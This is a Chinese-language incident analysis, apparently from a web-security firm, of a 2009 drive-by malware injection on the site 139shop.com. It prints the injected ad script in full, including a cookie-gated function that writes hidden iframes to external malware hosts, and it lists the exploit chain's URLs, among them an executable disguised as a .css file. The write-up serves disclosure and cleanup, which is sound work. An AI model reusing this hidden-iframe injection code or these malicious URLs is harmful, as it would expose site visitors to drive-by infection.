关于北斗手机网:
北斗手机网是国内最大的手机电子商务网站,致力于提供手机的B2C、B2B和资讯服务。在hao123网址之家手机频道有该网站的链接。

知道创宇网马监控平台早先于9月24日监测到北斗手机网挂马(139shop.com),当时我仅仅简单的检查了一下主页和其他报警页面里面有没有可以的框架、脚本,没发现这些以后以为是误报。

昨天晚上终于发现了问题的所在。
这里截取choose.139shop.com上的一段代码:
<script language=”javascript”>
function advInsert(advName,advid,widthNum,heightNum)
{
htmlStr=”<iframe src=’http://eva.139shop.com/adv/adv.asp?id=“+advid+”‘ width=’”+widthNum+”‘ “;
htmlStr=htmlStr+”height=’”+heightNum+”‘ scrolling=’no’ frameborder=’0′ marginwidth=’0′ ”
htmlStr=htmlStr+”marginheight=’0′></iframe>”;

document.getElementById(advName,advid).innerHTML=htmlStr;
}
window.setTimeout(”advInsert(’Banner1′,266,761,80);”,1000);
window.setTimeout(”advInsert(’paneRight’,497,200,200);”,1000);
</script>

这里构造了一个特殊的框架,在打开页面1秒钟之后才会插入框架。
恢复框架链接可得到以下两个链接:
http://eva.139shop.com/adv/adv.asp?id=266
http://eva.139shop.com/adv/adv.asp?id=497

分别跟入两个链接,可以得到类似一下代码(id=497):
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.1//EN” “http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd”>

<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<title>广告</title>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<style type=”text/css”>
body{margin:0px;padding:0px;border:0;}
</style>
</head>
<body>
<script language=”javascript”>
var myTime=new Date(2009,8,28,11,30,13);
</script>
<script language=”javascript” type=”text/javascript” src=”/adv/file/497.js”></script>  //这里的文件名即id号

</body>
</html>

跟入266.js未发现恶意代码,继续跟入497.js发现最下面的恶意代码:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()
document.write(”<div style=\”display:none\”>”);
document.write(”<iframe width=’0′ height=’0′ src=’http://968596969.9966.org/kuaile789/8.htm‘></iframe>”);
document.writeln(”<iframe width=’0′ height=’0′ src=’http://www.mszqw.com/1.html‘></iframe>”);
}
}Get();

该挂马利用了cookie的方法来防止重复感染,当成功执行挂马代码之后,1000天内不会再被感染。

其中http://968596969.9966.org/kuaile789/8.htm是挂马链接,http://www.mszqw.com/1.html间接引用51la的统计,记录点击数。

以下是http://968596969.9966.org/kuaile789/8.htm的分析报告
[root]http://968596969.9966.org/kuaile789/8.htm
[iframe]http://nm11df.cn/x50/xx.html
[iframe]http://nm11df.cn/x50/td14.htm
[script]http://nm11df.cn/x50/14.js
[exe]http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/15.js
[script]http://nm11df.cn/x50/17.js
[script]http://nm11df.cn/x50/16.js
[script]http://nm11df.cn/x50/18.js
[iframe]http://nm11df.cn/x50/yt.htm
[script]http://nm11df.cn/x50/k8.jpg
[script]http://nm11df.cn/x50/b.jpg
[script]http://nm11df.cn/x50/url.jpg
[exe]http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/c.jpg
[script]http://nm11df.cn/x50/d.jpg
[script]http://nm11df.cn/x50/e.jpg
[script]http://nm11df.cn/x50/f.jpg
[iframe]http://nm11df.cn/x50/td09.htm
[script]http://nm11df.cn/x50/01.js
http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/02.js
[iframe]http://nm11df.cn/x50/yut.htm
[iframe]http://nm11df.cn/x50/ytfl.htm
[iframe]http://nm11df.cn/x50/ff.html
[script]http://nm11df.cn/x50/ff.js
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/ie.html
[script]http://nm11df.cn/x50/ie.js
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ie.html
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ytfl1.htm
[iframe]http://nm11df.cn/x50/x1.htm
[script]http://nm11df.cn/x50/swfobject.js
[flash]http://nm11df.cn/x50/./x1.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x3.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x4.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x2.swf
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/x2.htm
[script]http://nm11df.cn/x50/swfobject.js
[flash]http://nm11df.cn/x50/./x7.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x9.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x10.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x8.swf
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/x1.htm
[iframe]http://nm11df.cn/x50/of.htm
[script]http://nm11df.cn/x50/of.js
http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/of3.jpg
[script]http://nm11df.cn/x50/of.jpg
[script]http://nm11df.cn/x50/of2.jpg
[script]http://tongji.linezing.com/1242634/tongji.js

知道安全团队希望北斗手机网的管理员尽快清除以下脚本文件中存在的恶意代码,以免更多的用户受到威胁:
http://eva.139shop.com/adv/file/6.js
http://eva.139shop.com/adv/file/161.js
http://eva.139shop.com/adv/file/296.js
http://eva.139shop.com/adv/file/376.js
http://eva.139shop.com/adv/file/495.js
http://eva.139shop.com/adv/file/497.js

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]